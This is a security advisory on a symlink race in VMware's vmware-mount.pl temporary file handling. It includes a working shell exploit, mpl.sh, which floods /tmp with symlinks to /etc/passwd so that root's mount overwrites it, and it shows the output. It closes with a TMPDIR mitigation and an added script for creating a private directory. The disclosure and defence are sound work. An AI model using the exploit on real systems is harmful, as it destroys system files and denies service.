COMMAND
VMware
SYSTEMS AFFECTED
VMware
PROBLEM
Paul Starzetz found the following. There is a symlink vulnerability in
the vmware-mount.pl script which ships with the latest VMware.
While mounting virtual disk drives using the vmware-mount.pl
script, a temporary file named vmware-mount.pl.PID, where PID is
the process id of the running command, is created in an insecure
manner: the name is predictable and an existing symlink at that path
is followed. This allows a local attacker to overwrite any local
file if root mounts a VMware virtual partition (mounting is usually
done as root).
Example:
paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh
VMware local /etc/passwd DoS
By Ihq.
linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl
After running vmware-mount.pl:
paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)
Obviously the passwd file has been overwritten:
paul@ps:/tmp > cat /etc/passwd
Nr Start Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
1 63 2096577 BIOS C Win95 FAT32 (LBA)
mpl.sh:
#!/bin/bash
declare -i n
declare -i mx
n=2
mx=32767
echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo
echo " linking /etc/passwd to /tmp"
while test $n -lt $mx ; do
ln -s /etc/passwd /tmp/vmware-mount.pl.$n
n=$(($n + 1))
done
echo "[+] please wait for root to run vmware-mount.pl"
echo
SOLUTION
vmware-mount.pl honours the TMPDIR environment variable and falls back to /tmp when it is unset:
$ grep TMP vmware-mount.pl
return defined($ENV{TMPDIR}) ? $ENV{TMPDIR} : "/tmp";
This is a simple variation on an old theme: predictable temporary file
names created in a world-writable directory. Make sure you have safe
TMP and TMPDIR variables set at all times, pointing at a directory that
only your own user can write to. If you want a set of scripts for safely
creating such dirs and setting env vars at login time, see the TMPDIR
scripts at
http://www.tux.org/~peterw/
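The mitigation above, as an added example that is not part of the original advisory or of VMware's own scripts: a small shell snippet that creates a private 0700 directory with an unpredictable name, verifies it is not a symlink and is owned by the caller, and exports it as TMPDIR so that vmware-mount.pl no longer falls back to /tmp. It assumes Linux with GNU coreutils (stat -c, mktemp -d); the function names are my own.

```shell
#!/bin/bash
# Added example, not the advisory's code. Assumes GNU coreutils on Linux.

# tmpdir_is_safe DIR: succeed only if DIR is a real directory (not a
# symlink), owned by the current user, and not writable by group/others.
tmpdir_is_safe() {
    dir=$1
    [ -d "$dir" ] || return 1          # must exist and be a directory
    [ -L "$dir" ] && return 1          # reject symlinks outright
    owner=$(stat -c %u "$dir") || return 1
    [ "$owner" = "$(id -u)" ] || return 1
    mode=$(stat -c %a "$dir") || return 1
    case $mode in                      # last two digits = group/other bits
        *00) return 0 ;;
        *)   return 1 ;;
    esac
}

# make_private_tmpdir [BASE]: atomically create a fresh 0700 directory with
# an unpredictable name under BASE (default /tmp) and print its path.
# Because mktemp -d creates the directory itself, another local user
# cannot pre-plant a symlink at that exact name.
make_private_tmpdir() {
    base=${1:-/tmp}
    d=$(umask 077; mktemp -d "$base/private-tmp.XXXXXX") || return 1
    tmpdir_is_safe "$d" || { rmdir "$d"; return 1; }
    printf '%s\n' "$d"
}

# Typical use from a login script (e.g. ~/.bash_profile): set both
# variables the advisory recommends; vmware-mount.pl reads TMPDIR.
#   TMPDIR=$(make_private_tmpdir) && TMP=$TMPDIR && export TMPDIR TMP
```

Any script that still uses a fixed name inside the directory is now protected by the directory permissions rather than by the unpredictability of the file name.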